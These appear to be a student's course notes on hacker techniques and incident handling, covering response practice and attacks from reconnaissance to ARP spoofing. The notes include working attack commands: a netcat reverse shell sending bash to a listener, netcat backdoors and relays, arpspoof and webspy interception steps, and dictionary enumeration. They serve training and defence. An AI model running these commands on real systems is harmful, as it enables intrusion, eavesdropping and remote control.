Hacker Techniques & Incident Handling Notes

advertisement
Hacker Techniques, Exploits & Incident Handling
Notes written by Uma Mahesh Padisetty
 Always have Handwritten Notes
o
Whom are you meeting, what did u ask, what commands .
✔ May be have audio recorders with you.
o
Sometimes video recordings can have policy obligations.
✔ When you do the job make sure management understands ur value in the form of Incident
handling summary i.e., slide of all incidents, here are graphs. For a quite month include info
from other or like SANS to avoid budget cuts.
✔ We need to have appropriate people on team should have core experts in all disciplines
o
Two from Unix, Two fron windows,
o
Network Management Personnnel as we get lot of info from routers and switches
o
In house Legal Council
o
Sometimes we need HR for taking actions on humans
o
Disaster Recovery /BCP should not be head on incident handling.
✔ Have System built checklist i.e., what are the basic system built documents for those servers etc.
✔ Inorder to run the Bridge calls, we need to have list of all contact info of key personnels or
emergency calls.
✔ Test your stuff periodically(not regularly..they hate u).
Source of Realworld Incident scenarios www.counterhack.net
CounterHack PPt: http://www.cs.sjsu.edu/~stamp/CS286/ppt/
✔ Incident Handlers sometimes need to have access to device with admin priveleges
o
Bargain with Operations Team.
✔ Provide a way to users to contact incident handling team
o
Provide hotline number, email source, occasional alert mails.
o
We need a special climate controlled room (say SOC)
✔ Always plan for backups for evidences
✔ Helpdesks are important and they are eyes of Incident Handling Team
o
Educate helpdesk people to report some specific incident to us.
✔ Incident Response Kit – set of tools
o
Have a jump bag of Harddisks to take backups.
o
Binay backup softwares – dd and windd
o
Netcat – move filysystem images across network, take output of certain commands
o
Forensic softwares
o

Freewares - Sleuthkit, Autopsy

Commercial tools – Guidance software Encase
Diagnosis software (sometimes a rootkit installed on the machine might lie to you
regarding the badguy as rootkit modifies operating system itself. So carry your
trustrworthy set of tools on a cd or pendrive for diognosis)

o
A good bootable Linux Disks – (eg: Helix)
Use something like Taps to capture. Cant use Hubs,switches

Cannot use on servers

Bad guy can identify as it is bidirectional

Available from NetOptics (USB powered TAP is easy to use)
o
Cables (1 straight through, 1 crossover cable, 1 USB to Serial cable, 1 Serial cable for
Routers, extra harddrive cable)
o
Laptop with multiple operation systems (Atleast virual machines)
✔ Interview the operations people with open ended questions like
what recent changes made the firewall?
what recent configurations?
what patches?
any scripts executed?
✔
Involve your peers into handling the incident and everyone maintain notes.Also involve the
necessary people such as adminstrator, business manager, Risk Manager, Client POC, etc.
✔
Network Perimeter Detection

✔
✔
tcpdump -n
Host Perimeter Detection

Firewall Logs

netstat -an

Virus Response Tool Kir (LiveIR)
System Administrator Cheet Sheets (for windows and linux) are some commands that system
administrator use to find any anomalies.
Session 2 – Click on PDF Below
Not "If" but "When"
Essential Incident Handling Techniques
for System Administrators
John Ives (jives@security.berkeley.edu)
System and Network Security
 sc – services controller, services.msc, msconfig, net view etc.,
 at – to check what jobs are scheduled, process explorer from sysinternals
 Netcat – To transfer data across TCP and UDP Ports
 We have to create a chain of evidences (Collection of events) on document. Eg: when law
 enforcement officer asks for harddrive, ask for proof (mail, fax) and then send Copy of the real.

 Preparation
 Identification
 Containment:
o
Short term containment: Pause the Attacker temporarily without changing the
configurations made by attacker. Ie., Blocking the network, port, Isolate the machine.
Maintain good relation with management sponser who will provide resources, remove
blocks across. Management sponser can be LIRM, SDM – Notify him
Coordinate with Network Personnel to isolate the Machine from network. It can be done by
pulling the LAN cable from the machine, Blocking the switch port attached to the machine.
Usually Badguys hit with IP address. Change the IP in DNS Servers so that your customers
come to your actual service while bad guy try to his the old machine. It helps until we get
some information. The Problem is convincing the Management.
Maintain a Low Profile while investigating. Do not do reconnaissance from the infected
machine. If needed do from other machine (Lab)
Backup the Machine (Create Images – use DD, WinDD etc from Live CD)
How do you deal with filesystems of terabytes of data???
Usually such devices has RAID Mirroring. So It has a button to synchronize the mirroring.
Here you go., push the button and take it
Using built-in backup softwares
Copy Only system Partition where OS resides and the logs.
Use some Tools for logging the incidents and provide the incident number.
Eg: RTIR (Real Time Incident Response) - http://bestpractical.com/rtir/
BlackThorn - http://www.qccis.com/blackthorn
o
Long term containment and Erradication:
remove/disable accounts
shutdown/remove backdoor
change passwords
 Erradication
 Recovery
 Lessons Learnt
<<checkout the slides>>

Ask Open ended questions. Do not ask yes/no questions.

Espionage: Espionage or spying involves an individual obtaining information that is considered
secret or confidential without the permission of the holder of the information.
Tip#1: When handling such cases, use trusted people.
Tip#2: Try target analysis of our own organization.
Tip#3: To generate an event while transferring critical documents, assign a Unique Serial Number in
it so that google can bring it up, Use some signature if IDS can identify the transfer..
Tip#4: Always have access to various logs, not just Device logs but physical logs such as Datacenter
entry login/logout, call record of some person, surveillance videos etc.,

Unauthorized use:
Tip#1: Organizational Reconnaissance.

Phone Phishing:
In the email, it states that your account has the problem, please call the number to fix It. The
number goes to VOIP and phishing IVRS of the bank asking to input account number, pin for
authentication.

In Appropriate Web access:
Pull the proxy logs.(But do it only if HR asks in writing not the manager asks)
Bluecoat, SurfControl etc can block unwanted sites categorized as Pornography, Malware Sources
etc

Insider Threat:
It could be contractor, business partner, employee.
It can be destructive, non destructive (=>doesn’t mean not damaging, they copy and take it out)
They might put Logic bombs .
Warning Banner helps prevent insider threat. Always get authorization from HR when monitoring
suspicious person otherwise might sue you.
Ask open ended Questions…

Intellectual Property Theft:
Patents: Protect Innovations
Copyrights: Protects specific expressions of ideas, content
Trademarks: Protects Brands
Confusion Attack: Using same fonts, colors to confuse between original and duplicate eg: Microsoft
and Microsaft.
Tradesecret Protection: Things we derive economic value for them being secret. Provides various
penalties for violation. Protecting against Theft.
How to identify breach in intellectual property?
To prove the theft and intellectual property violation, we need to show that we made enough
protection to it.

Law, Crime and Evidence
Three Domains:

US Federal Law:
Title 10 Section 2030: Computer fraud and Abuse Act
1) Computers working for govt
2)Computers associated with Infrastrucure
3)Computer associated with e-commerce
The laws apply only if Damage > $5000
DAY2
Session 1
Talks about vulnerabilities, disclosures and complications
 Whenever vulnerability is found it is advised to contact vendor and go public when he patches or a
timeframe of 90 days (mostly) and even 180 days before going public. If vulnerability found via
Reverse Engineering, you could be sued by DMCA Act.
 Tipping point will buy the vulnerabilities.
 Send the vulnerability via Proxy like US Cert, SANS ISC.
 Hactivism: Hacking to make a political point.
Create a Malware  Create Botnet Rent the Botnet (eg: for Hactivism)
 Scarewares, Codecs – Drive by downloads
How does Hacker start attacking?
Reconnaissance
 Whois – one can get contact information of the domain
Findout Registrar associated with the domain
Registrar would provide details
sometime IP can be block of ips, it can be ISP
http://yehg.net/lab/pr0js/misc/wsa.php
sometimes when the contact is person, then social engineering can be played on him for
reconnaissance.
P.s: There are some anonymous registrars who will not put up owners information. This will
slow down contacting process
DNS Interrogation Bad guys always want to have as many as records as possible. Zone Transfers – The hackers way
to get most out of DNS. It is used to transfer DNS records from Primary NS to Secondary NS.
However hackers exploit to collect the DNS Records. There are perl scripts (Found on BT) for
DNS Enumeration – DIG can be used for zone transfer
Get the Name Server
#dig counterhack.com
<<provides the Name server of counterhack.com>>
Ask the Name server about the domain using Protocol AXFR (or IXFR)
#dig @ns1.highland-parking.net counterhack.com axfr
[As a security feature, most of name servers might disabled it]
Nslookup on windows does the same purpose.
Usually organization keeps secondary, teritiary NS with ISP, and whom support ZoneTransfer.
Send a mail to ISP to block it.
DNS is highly critical infrastructure and always harden it.
Identification of DNS compromise:
Look for Zone Transfer - Normal DNS use UDP 53 while Zone Transfer use TCP 53.
Also DNS Reponse Bigger than 512 Bytes.
Also DNS Request Bigger than 512 bytes can be an attack for buffer overflow.
 Website Searches : Press releases, Job Openings, Business Partners, Phishing attack on
employees
Defences:
 Preparation:
Look at your own websites,
See what your employees talk about in news groups
Make Job opening description generic
Identify web crawler activity from the logs
 Google Searches:
Johny Lang – Using Google for Penetration Testing
phonebook: James Smith
Google Provide phone book search () – provides for US
Directory– Search only from this site
site: isc.sans.com
Search only from this site
link: wikihead.wordpress.com
Shows everything that links to that site
intitle: Honeypot Indepth
Search the keywords in the title
sometimes the files on the server are listed with title Index
Hence “site:domain.com intitle:index”
inurl: robots.txt
Search term in the URLs. Helps identifying critical files like
shown beside
wikihead –malware
-
Discard the term malware from search (minus)
+
Eg: ‘X and Y’ strips out and
so use X+and+Y
X.Y
- one character
Google Cache:
contain website image from google servers
Helps to view deleted contents on the site
P.S: Data in google cache can be removed by using google
webmaster tools
Language Translation
http://translate.google.com
Browse the website using google translator. You can
browse anonymously…(not ultimate anonymous)
filetype: pdf
Reports only PDF files with given search terms
Ext:rdp
Shows rdp files (Remote desktop files)
GHDB – Google Hacking Database
robots.txt – it lists out what are the files or folder that should not be crawled
[Honeypot Use# check the ip who accessed the file mentioned in robots.txt… it is a malicious
bot]
noindex, noarchive, nosnippet etc written to robots.txt can prohibit google Bot to capture
unwanted info on the server.
USERAGENT Switcher : A Plugin in Firefox to change the UserAgent of web request.
Google URL Crawl Request Form: Google crawls the site from scratch again from root.
GoogleCheatSheet.p
df
 SAMSPADE – A simple tool for whois, dns, tracert etc for reconnaissance
It has webcrawler.
wget –r
[Web crawling for local mirroring]
SCANNING
 WarDailing:
Phone Sweep: Dail the numbers in sequence.
NudgeString: Replay a pattern of signal when modem is found (Modem style attack)
Remediation: Use modem only if vendor has strong requirement, even if used ask for Strong
userid and passwords.
Conduct a WarDailing Exercise.
[There are Voice IPS which detects wardailing and blocks the calls to modem if vulnerable]
As in IR member, you should have contact with person who can tell you where the phone ends
inside the company.
 Netstumber: It is a good tool for wardailing tools for Wireless Access Points. If WEP is used,
capturing some packets can crack the keys.
 AIRCrack-NG: A superb one to crack the WEP keys.
SESSION 2
 KARMA - http://www.wirelessdefence.org/Contents/KARMAMain.htm
KARMA is a set of tools for assessing the security of wireless clients at multiple layers.
1. It sniffs the 802.11 Probe request packets passively and there by discover clients.
2. From the packets, it extracts what network the clients want to connect to (I guess it would
be SSID)
3. KARMA includes patches for the Linux MADWifi driver to allow the creation of an 802.11
Access Point that responds to any probed SSID
4. It starts the services ACCESS-POINT, DNS-SERVER, DHCP-SERVER, FTP-SERVER
5. When the user wants to connect to internet via ssid, Karma acts as MIM, assign a DHCP ip to
victim and capture all the traffic. It acts as fake DNS, FTP server to capture credentials and
returns nothing.
karma-lan.xml - "This configuration runs a rogue DHCP, DNS and HTTP services on an existing
(wired) network connection. The HTTP service redirects all requests to ExampleWebExploit module
that displays simple HTML page"
Usage:
cd /tools/wifi/karma-20060124
bin/monitor-mode.sh ath0
bin/karma etc/karma-lan.xml
 ASLEAP – Exploits Cisco LEAP Protocol http://www.wirelessdefence.org/Contents/AsleapMain.htm
The Lightweight Extensible Authentication Protocol (LEAP) is a proprietary wireless LAN
authentication method developed by Cisco Systems. Important features of LEAP are dynamic WEP
keys and mutual authentication (between a wireless client and a RADIUS server). LEAP allows for
clients to reauthenticate frequently; upon each successful authentication, the clients acquire a new
WEP key (with the hope that the WEP keys don't live long enough to be cracked). LEAP may be
configured to use TKIP instead of dynamic WEP.
This password is not encrypted and transferred while authenticating, but some complicated hash
..blah.. blah..blah… is transmitted on air for authentication. There is a weakness which is exploited
by using dictionary attack against those hashes transmitted to retrieve WEAK PASSWORDS.
 A simple defense strategy employed is MAC Filtering at AP… Oh…MAC is spoofable..
Just sniff the mac from packets and use when the machine is offline.
 WPA2 is Stronger Access Authentication Mechanism
 Attacking Aggressive mode IKE which is used for wireless VPN Connection is easily crackable
It takes short cuts to improve performance by avoiding rekeying.
IKE Aggressive Mode:
In IKE Aggressive Mode the authentication hash based on a prehashed key (PSK) is transmitted as
response to the initial packet of a VPN client who wishes to establish an IPSec tunnel. This hash is
not encrypted. A packet sniffer (i.e. tcpdump) can be used to capture these hashes and a
dictionary or brute force attack can be used against the hash to recover the PSK
This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already
encrypted. Based on this fact, we can learn that IKE Aggressive Mode is not very secure.
Tool: IKECRACK - http://ikecrack.sourceforge.net/
Hence the tip is Disable Aggressive IKE
Proof Of Concept: http://www.ernw.de/download/pskattack.pdf
 Cisco AP has integrated security mechanism and can also assist by jamming the Rogue machine. But
it is problematic as it can jam any machines in the vicinity that belong to another company. Mostly
Jamming is legally banned and will not be used. I believe other guy can sue you.
 There are some WIPS such as AirMagnet, AirDefense
WIRELESS LAN Security Policies
 WEP shouldn’t be used
 Disable Aggressive IKE
 When Jammers are used, put a sign board notifying the same
<<Working with NETSTUMBLER>>
Is Wardriving with Netstumbler legal?
Ans: It depends…..
Since it sends BEACONs and receives Responses. Hence it is advised to disable DHCP.
Passively sniffing is legally wrong as it might object their privacy.
TIME: 30 MINS complete
Network Mapping:
We need to get topology
Cheops-NG: http://www.digipedia.pl/man/doc/view/cheops-ng.1/
It is simple tool that provides what are the network mapping by using host discovery and also port
discovery on the machines. It uses ping, traceroute for network mapping
Sending a packet for traceroute with TTL = 1, i get first hop machine
Sending a packet for traceroute with TTL = 2, we get second hop machine
Features:
 Host discovery - Uses ICMP ping packets
 Machine fingerprinting to determine OS (using Nmap) - Runs an nmap command to determine
OS fingerprinting.
 Use of DNS and ICMP to detect network hosts
 Network mapping - Mapping is done using UDP (or optionally ICMP) packets with small time-tolive values (traceroute and mtr, respectively)
Usage:
1. First Start the Cheops Agent on the machine
#cheops-agent &
2. Connect to Cheops-Agent
#cheops-ng
3. Enter the IP of the machine on which Cheops-agent is running.. currently it is localhost
4. Add Host in the workspace.. just one targetmachine
Recommendations
✔
Usually Corp blocks pings.
✔
Also Block outgoing ICMP packets
>>>Simple Details on TCP, UDP Headers<<<
Port Scanner – NMAPhttp://www.insecure.org/presentations/Shmoo06/
(nmap on windows is not reliable due to non robust TCP/IP stack in windows)
Break: 1:35 Hrs
Defenses
●
●
Disable all ports until there is a business need
periodically check the rule base for its need.
Tools:
Windows:
netstat -a,
netstat -ab
--- it lists all details of dlls, process that are connected
TCPView
WMIC (Windows Management Instrumentation Control)
Linux:
LSOF (list open system files)
lsof -i -- shows out open connections
losf -- lists all the openfiles by all applications
KILL – kills the process
chkconfig – used to manage services to load in each of the runlevels
chkconfig --list [name]
chkconfig --add name
chkconfig --del name
chkconfig [--level levels] name <on|off|reset>
Eg: chkconfig –-add xinetd
chkconfig -–level 5 xinetd off
Excerise
Do TCP Scan, Decoys, SynStealth Scan, Connect Scan
To check outgoing packets – tcpdump -lio
Version Scanning
Why not connect scan with Decoy scan?
Passive Fingerprinting
P0f2
NetworkMiner - http://networkminer.sourceforge.net/
It can also pull out files transferred from the dump files, clear text contents in the dumps. Very nice tool
Determining Firewall Rules
✔
Using ICMP instead of UDP for traceroute can reveal info about the devices behind
firewall, as they may not be blocked by firewall]
✔
#traceroute -I 10.9.23.1
UDP Port 53 is usually unblocked at firewall since it is needed for DNS
queries/responses. Hence we need to fool the firewall. Normal traceroute will increase
sourceport monotonically with each hop, and three packets are delivered to each hop.
So inorder to send a packet that has port 53 at firewall, we have to set the initial port
number as TargetPort – (number_of_hops * number_of_probes) – 1
I.e., 53 – (8 * 3) – 1 = 23 [suppose number of hops before reaching gateway is 8]
#traceroute -p28 10.9.23.1
This will only give about device just after gateway only..:(
Instead, stop the incrementation
#traceroute -S -p53 20.9.23.1
Layer Four Traceroute (lft)
It determines what packets are allowed through the firewall.
Firewalk - http://packetstormsecurity.org/UNIX/audit/firewalk/firewalk-0.99.1.tar.gz
It employs traceroute-like techniques to analyze IP packet responses to determine gateway ACL
filters and map networks. Firewalk the tool employs the technique to determine the filter rules
in place on a packet forwarding device.
In order to use a gateway’s response to gather information, we must know two pieces of
information:
• The IP address of the last known gateway before the firewalling takes place
• The IP address of a host located behind the firewall.
Using Proxy Servers, can eliminate Firewalking
Some NIDS, also detect firewalking.
2:28 PM – Vulnerability scanning
These Vulnerability scanners detect only known vulnerabilities and do not identify zero-day vulns. Hence
it is always advised to have multiple layers of security. As an exercise Just take the topology of DMZ and
believe that one machine is compromised by zero-day vulnerability. Then think of the solution.
Nessus
They generate huge reports, which is hard to understand. It also donot do correlation, cross correlation.
Nessus has Plugins, where each plugin tests one test on the target environment
NASL (Nessus Attack Scripting Language) – is used to create plugins
Architecture:
Nessus Client communicates with Nessus Daemon Server that tells to do the scan.
NessJ – A java based nessus client that provides in understandable format
Dangerous Plugin – can cause damage to end system.(Like DOS based plugins for checking vulns)
1. Install Nessus
2. Create a certificate
#nessus-mkcert
3. Add User
#nessus-adduser
4. Start Nessus Server Daemon
#nessusd -D
5. Start the Nessus Client
#nessus
6. Nessus GUI is displayed, Login and start the scan
7. It is advaised to run updates periodically
#nessus-update-plugins
WebApp Scanner
They knew about known CGI vulnerabilities, Active server page vulnerabilities etc
Eg: Awstat vulnerabilities, phpBB vulnerabilities
Nicto WebApp Scanner – A free tool written in perl.






It will look for CGI files for vulnerabilities
It looks into robots.txt
It has port scanner
It has application level IDS Evasion
Supports Web Authentication
supports ssl, it has mutation functionality
Victo – a similar tool with GUI that includes Goolge Hacking DB support.
IDS Evasion
 Packet Fragmentation – technique is used to evade detection
In the Ip Header,
DF bit – Dont Fragment
MF bit – More fragments are coming
Fragement Offset – used for reassembly
IP ID value is used to assemble the fragments
However, wireline IDS are detecting these attacks using Virtual Packet Reassembly Buffers.
Unfortunately, Wireless IDS are not detecting fragmented packets, and can easily pass through.



Sending Small Packet fagments (Session Splicing)
Pause sending fragments so that IDS timeout but not the host machine
Overlapping Fragments - For example, the first packet will include 80 bytes of payload but the
second packet's sequence number will be 76 bytes after the start of the first packet. When the
target computer reassembles the TCP stream, they must decide how to handle the four
overlapping bytes. Some operating systems will take the older data, and some will take the
newer data.
FragRouter Some IDS gives you option to block fragmeted packets? Although not recommended. Check
out before blocking.
r
Runs on Unix/Linux systems
r
Provides over 35 different schemes for fragmenting flow of data
r
Separates attack functionality from the fragmentation functionality
Some Fragmentation Types,


r
Sends data in ordered 8-byte fragments
r
Sends data in ordered 24-byte fragments
r
Sends data in ordered 8-byte fragments with one fragment out of order
r
Complete TCP handshake, send fake FIN and RST (with bad checksums) before sending data in
ordered 1-byte
Obfuscating attack payload
Send the data such that IDS cannot understand but victim Machine can understand. Viz.,
Using Unicode encoding, Attacking via HTTPS (Usually backdoors planted by attacker work
under https)
Inserting Traffic at the IDS
Send the traffic such that IDS only see and determine state for a machine, but the packet actually
doesn’t reach end machine. I.e., by sending a RST packet with less TTL value so that it expires after
reaching IDS. Also sending a packet with bad checksum so that end machine will discard.
Gaining Windows Data through Null Sessions [Enumeration]
Most powerful account on the machine – system [not Administrator]
A null session is an anonymous request comes such that I am nobody, coming from nowhere and please
give me some data
With a NULL session hackers can call APIs and use Remote Procedure calls to enumerate information.
These techniques can, and will provide information on passwords, groups, services, users and even
active processors. NULL session access can also even be used for escalating privileges and perform DoS
attacks.
Usually Information Enumerated by Intruders
 Network Resources and Shares
 User Accounts and Groups
 Applications
Anyone with a NetBIOS connection to your computer can easily get a full dump of all your usernames,
groups, shares, permissions, policies, services and more using the Null user ---Just check out for open
ports on your machine 139, 445 which are netbios ports, almost 90% of machines have them open.
Sample Hack using NetBIOS Null Session:
1.
Impacket Samrdump - an application that communicates with the Security Account
Manager Remote interface from the DCE/RPC suite. It lists system user accounts, available
resource shares and other sensitive information exported through this service.
bt smb-enum # samrdump.py guest:''@192.168.1.104 139/SMB
Retrieving endpoint list from 192.168.1.104
Trying protocol 139/SMB...
Found domain(s):
. YOUR-O1N9OY17SK
. Builtin
2.
DumpSec – It dumps information about system users, file system, registry, Permissions,
Password Policy and services
3.
Enum – A simple console based tool that can be used in scripts
#enum –u
--- Lists users
#enum –g
--- Lists Groups
#enum –s
--- Lists shares
#enum –p
--- Lists Password Policy
C:\> enum –D –u <username> -f <dictionary>
dictionary is a file containing list of passwords which can be obtained from any
password cracking tool
Downlink for windows: http://www.indianz.ch/tools/scan/enum.zip
4.
WinFingerprint
Having Established a Session
We can use tools like rpcclient to execute RPC command on the client machine.
Defense:
 Change the Registry Entry Restrict Anonymous to 0x02
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA
 Drop the packets destined for port 135-139, 445
[ Default: 0x01 ]
Day 3
Spoofing
Sniffing
Mac Flooding
Arp spoofing
Session Hijacking
DNS Poisoning
Buffer Overflows
Format String Attacks & Exploits
Spoofing
Decoy scans with Nmap are examples of spoofing
They are done to exploit trust relationship, to pass through ACLs, DOS attacks, to avoid logging attacker
traces.
1. Change IP Address
2. TCP Guessing
3. Source Routing
On Unix, source ip can be changed via ifconfig
OnWindows, it can be changed via Network control panel or net sh
Change IP Address
Tools:
Nemesis – It presents like TCP/IP stack, we you fill the data and it crafts the packets
Hping2
Netdude – I can read the pcap files and graphically represent the communication.
Here we can edit the connection settings etc., and save the capture. Now we are ready for Reply Attack.
Now the Problem is How do you go with TCP 3 way handshake with spoofing?
The receiver sends SYN/ACK to spoofed address, wherein he sends back RST. So whats the use?
Spoofing is useful for UDP kind of Attacks
TCP Guessing
MitNick Attack to create 3 way handshake
Prior to launch attack sample as many packets as from Admin Server and do statistical analysis to predict
Sequence Number.
1) Disable Admin
2) Send spoofed SYN packet
3) Send spoofed ACK packet with predicted Sequence number
4) From Target machine perpective, it has established a tcp connection to admin
5) Now execute a command “Please add attacker to rchosts file.
6) Now attacker can directly authenticate with Target Machine
Source Routing
Defences
1. Make TCP Sequence number highly random i.e., always apply patch from vendor if it belong to
TCP stack
2. Be careful with Trust Relationships (rlogin, rsh). It is advised not to extend trust relationship
beyond the firewall. Since it’s recommended to allow trust relationship between machines
having same level of control, threat and security. Also having firewall we can block the intruding
attempts.
3. Authentication should not be based on IP Address. I.e., if you say allow only this ip to pass
through to DMZ… Lol..it is spoofable. Hence use some other authentication mechanism like
username password, VPN etc.,
4. Replace remote commands like rlogin, rsh, telnet and ftp with SSH.
5. Some Legacy systems might not work with ssh etc. In that case, Use another machine a hop
prior to legacy machine. Connect to the machine in a secure fashion and then use rlogin, rsh to
the legacy system
6. Anti Spoof Filters at firewalls Eg: If I see a packet with SIP 20.*.*.* from this interface, Drop it
7. Enable Unicast Reverse-Path Forwarding Check on Routers
It check its routing table for source address and incoming interface to determine whether
packet is coming from path that sender would use to reach destination.
8. No Source Routing, No IP directed Broadcast at Border Gateways.
Identification
1. Make sure Anti Spoof Filters generate log when they detect spoofing. Usually Log analyzers such
as Envison will collect logs from firewalls etc shows up these alerts
2. IDS Sensors that look at ip addresses that do not belong here.
Containment
1. Identify the machine and remediate.
NetCat - http://h.ackack.net/cheat-sheets/netcat
It reads and writes data across network connections, using TCP or UDP Protocol.
1. Netcat Client Mode --It initiate connections
2. Netcat Server(Listen) Mode -- It listens on the tcp/udp port
Command Options
nc –l
nc
nc –L
nc -u
nc –p
nc –e
Nc –z
nc –w <sec >
nc –vv





Description
Listen Mode
Client Mode
Listen Persistently
When listening normally using nc –l, it waits for connection. Once established
and client terminates the connection, Listen mode is also dropped. Where as in
Persistent listen mode, even if client terminates the Conn, it’s still listening.
UDP mode, if no –u it is tcp
In Listen mode, It is listen on that local port 80
In client mode, it sends data from source port 80 (Local)
Execute a program after connection has occured
Zero IO, no data transfer, only tcp connection estd, may send UDP packets
Wait for connection, Eg: nc –w 3 waits for 3 seconds for connection before it is
teared down.Even if connection is made and no data for 3 sec, it will go off.
Very Verbose
It can be used to transfer files on tcp/udp ports
Port scanning, Banner grabbing
A Small vulnerability scanner – what vulnerable services running on target
Backdoor
Relay
Suppose we want to do port scanning, It is a good idea to use port 80,443 so as to evade detection.
Also its better to scan ports in a random fashion using –r switch
C:\>nc –v –r 192.168.12.1 1-100
Now connection is established… Whatever you type at client will be visible at server and viceversa.
Transferring IO (Even Files)
We need to use < > | to redirect IO between connections
C:\Mahesh\Tools\NetCat>nc -vv localhost 17876 < readme.txt
Now readme.txt is transferred to another machine listening on port 17876
Backdoor
Not only just input, it can bind an executable on some port specified
On Server,
C:\Mahesh\Tools\NetCat>nc -lvvp 17876 -e calc.exe
listening on [any] 17876 ...
DNS fwd/rev mismatch: localhost != RedPC
On Client,
C:\Mahesh\Tools\NetCat>nc -vv localhost 17876
DNS fwd/rev mismatch: RedPC!= localhost
RedPC [127.0.0.1] 17876 (?) open
Now at client, Calculator has popped up.
Backdoor 2 (Reverse Shell)
Creating a listening shell with Netcat is a valuable technique but in order
for this technique to be effective the attacker needs to be able to send data
to the port on which Netcat is listening. This can pose a problem if there is
a router or firewall in the path blocking inbound traffic as you will not be
able to reach the listening port. We can also send commands to server to execute
Attacker: Server is listening for connection
C:\>nc -lvvp 4444
listening on [any] 4444 ...
Victim: Client sends the terminal to server
BT ~ # nc -v 192.168.0.198 4444 -e /bin/bash
192.168.0.198: inverse host lookup failed: Unknown
(UNKNOWN) [192.168.0.198] 4444 (krb524) open
Alice: After Connection – Ready to take commands
It is suggested to use Netcat instead of Telnet when you find any open port on any machine bcoz
Netcat is fast and telnet use telnet control sequences which might blowup some applications running
on end machine.
Replay Attack
From the pcap file, we can strip off headers and save the content only to a file and transfer to target
machine using netcat. Eg; If we have transaction command “TRANSFER 1000$ from Acc A to Acc B”,
replay it.
Relay – When you attack victim, be untraceable..
Hackers use relays which are located at least in 5 locations which are geographically distant and has
bad political relationship. Eg: To attack USA, start with relay at China  India Pakistan Israel
Ukraine.
1
2
Attacker first compromises Relay 1 and Relay 2
Configure a Relay with Netcat Listen on one Port and Netcat Client to forward to another
Relay on another port.
Attacker:
C:\>nc <Relay1> 4321
Relay1:
C:\> nc –L –p 4321 | nc <Relay2> 4321
Relay2:
C:\> nc –L –p 4321 | nc <Target> 4321
NOW, We have established a one-way channel from attacker to Target
Target:
C:\>nc –L –p 4321
<<Not Clear Look into it>>
1:17
Defending Against Netcat
 Prevent Netcat file transfers  Firewall configuration issue
 Secure against port scanning Minimal number of listening ports
 Block arbitrary connections to ports Close unused ports [Open port should have
justification]
 Protect against vulnerability scanning Apply patches
 Backdoors  Need to know what processes are running so you can detect rogue processes
 Prevent relay attacks No single point that attacker can relay around
 Stop persistent listeners Periodically check for unexpected listening ports
Excersize
Create Backdoor, Create Relay
Scneraio: You are sitting outside firewall that blocks inbound access but allow outbound packets.
How do get outside access to listener inside?
SNIFFING
Wireshark – It can parse many protocols
Sniffit – It can be used in interactive mode sniffit –i
i.e., its ability to handle the interactive sniffing of sessions in real time.
Attacker can directly see what the victim is doing in real time sniffing the session
These tools only works for Passive Sniffing (Parsing packets coming on to the NIC) and hence work
in Hub environment
Active Sniffing – Injects the packet into network so as to sniff in Switched Environment
DSniff – A collection of tools for network auditing and penetration testing.
Foiling Switches Using ARP Spoofing [Arpspoof] -
Over an Ethernet, data is transferred
using frames containing Source and Destination MAC addresses. The Destination Mac address is
identified by sending ARP Request
A Machine upon ARP Reply Packet, (irrespective of whether ARP Req sent or not)
Machine updates ARP Cache (Mapping of IP to MAC Addr)
1. So If victim host receives a ARP Reply packet containing valid destination ip (A
router/server etc) and attackers MAC Address… hoila…victims machines has been
Poisoned.
2. Configure your machine with IP Forwarding (If the packet is not destined for your mac,
forward to Default Gateway)
IP Forwarding on Linux - echo 1 > /proc/sys/net/ipv4/ip_forward
[TTL is decremented, as an investigator if we can identify if Initial TTL and TTL value has
extra decremented, need to look into]
Practically ARPs can be used for good, such as Failover cases, ARP the router to failover
machine.
Foiling Switches using Flooding the Switch [Macof] –
1. Send Ethernet frames with spoofed MAC address to the switch so that MAC Address
Table on the Switch is filled and no more entries can be loaded
2. Now Some switches goes to either Denial of Service state delivering no packets or Hub
state delivering packets across all the interfaces of the switch.
Additional Tools with DSniff,
TcpKill
Kills active TCP connections
When there is a telnet connection, you can break the connection by sending RST
Packet to both ends. Now sniff while re authentication to gather Credentials
Tcpnice
Inject ICMP source quench Message to slow down the traffic
FileSnarf
Capture the Transferred Files
MailSnarf
Grabs e-Mails sent using SMTP and POP
MsgSnarf
Grabs messages sent using AOL Instant Messenger, ICQ, Internet Relay Chat, and
Yahoo! Messenger
URLSnarf
Grabs the URL visited
WebSpy
Using the URLs captured from the network, displays the pages viewed by the victim
on the attacker's browser. Essentially, Webspy lets the attacker look over the
victim's shoulder as the victim surfs the Web. Webspy is quite useful for demos to
management
HTTPS don’t work
Things that have auth using cookies etc., may or may not work
Excerise - WebSpying on a Victim
1. Enable IP forwarding [ or use FragRouter with no fragmentation ]
# echo 1 > /proc/sys/net/ipv4/ip_forward
2. ARP Poisoning on Victim and Gateway
#arpspoof –i eth0 –t 192.168.1.5 192.168.1.1 [Poison the Target using Gateway IP]
#arpspoof –i eth0 –t 192.168.1.1 192.168.1.5 [Poison the Gateway for Target IP]
Now you are MIM.
3. Use WebSpy to grab the Browser traffic [IE and Netscape]
#webspy –i eth0 192.168.1.5
[Spy on the target IP traffic]
4. Start Browser from Command line
#firefox &
5. Now you can see what victim Is browsing.
Just a Tip: If possible try to have proxy logging UserAgent Types in Webtraffic. We can identify malware
infected machine and traffic.
DNSSpoof
WEBMITM (Web Monkey in the Middle) - It acts as proxy.
After DNS Spoofing, the victim comes to you for the service he is trying. Eg: He want to go to
Banking site www.abcbank.com, DNSSpoof running on attacker machine sends spoofed DNS
Response to victim claiming it is the abcbank.com. Now user come to you.
Now you have to either phish the site or proxy the site.
The problem with above is Certificate Errors. Victim is presented with Attackers Certificate but not
the abcbank.com certificate which will warn the users that somebody is pretending to be you bank.
Firefox Certificate Warning
Network Attacks
37
The Top Warning box can be avoided by having a signed certificate from CA.
Second Warning Box is caused due to the fact that the browser will notice that the DNS name in the
certificate does not match the name of the Web site that the user is trying to access
A careful attacker can make sure the name on the certificate matches the domain name of the
Web server, but a legitimate, trustworthy Certificate Authority should never sign such a bogus
certificate of someone impersonating a bank
Unfortunately, most users just click yes..yes..yes to establish ssl connection with untrusted site.
Same works for ssh also
Defences
 system administrators, network managers, and security personnel understand and use secure
protocols to conduct their job activities
 networks containing very sensitive systems and data, enable port-level security on your switches
i.e. Bind the MAC address to a Port using Port Security.
 For Extremely sensitive networks like Internet DMZs, use static ARP tables on the end
